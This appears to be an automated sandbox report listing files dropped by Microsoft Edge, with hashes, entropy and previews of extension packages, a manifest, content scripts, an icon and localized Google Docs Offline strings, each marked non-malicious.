                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):154545
                                                                                                                                                                                                                                                            Entropy (8bit):7.839678617100523
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:zZH5WPD5SqCJryow8AWTtwGrasOQNHjWRKnvXTwL:zpIPFCXjAWTtwGusOWmMvjwL
                                                                                                                                                                                                                                                            MD5:EAE462C55EBA847A1A8B58E58976B253
                                                                                                                                                                                                                                                            SHA1:4D7C9D59D6AE64EB852BD60B48C161125C820673
                                                                                                                                                                                                                                                            SHA-256:EBCDA644BCFBD0C9300227BAFDE696E8923DDB004B4EE619D7873E8A12EAE2AD
                                                                                                                                                                                                                                                            SHA-512:494481A98AB6C83B16B4E8D287D85BA66499501545DA45458ACC395DA89955971CF2A14E83C2DA041C79C580714B92B9409AA14017A16D0B80A7FF3D91BAD2A3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...................h...|..=.Ih.\...T.....}..u0...HVND......R....~D.H$9w._2.3.2...5.H.V.@....k;..c.V.7s....9o`_3qP{}....*.G....5.:.m..]..:.w|'..lG.../..,...G....g...O..}....K.Hk......T>..F7G.!n..h.j...J...XzbG..*..kK]!z..;.K.U.......1:..7w.....6...N.I!....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!...j9%2/.....(-.C.....].=....I.a..!......k..,i.....T.m.xM.W4.)`0..6R".%............m..8.....|.#......`..L0~..F-....B%.Bh.......H....R..~...Z....7Q...y....?.....[......t........J.R^....o....?.%....3h...8.....e..0.v..33.Si...._....3.d.S...Y....b.....O.s$......~...)l..g._.);.S.......yn@.....3iG.).I76.]..].t_..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1753
                                                                                                                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):962
                                                                                                                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4982
                                                                                                                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):908
                                                                                                                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1244
                                                                                                                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3107
                                                                                                                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                            MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                            SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                            SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                            SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1763
                                                                                                                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                            MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                            SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                            SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                            SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
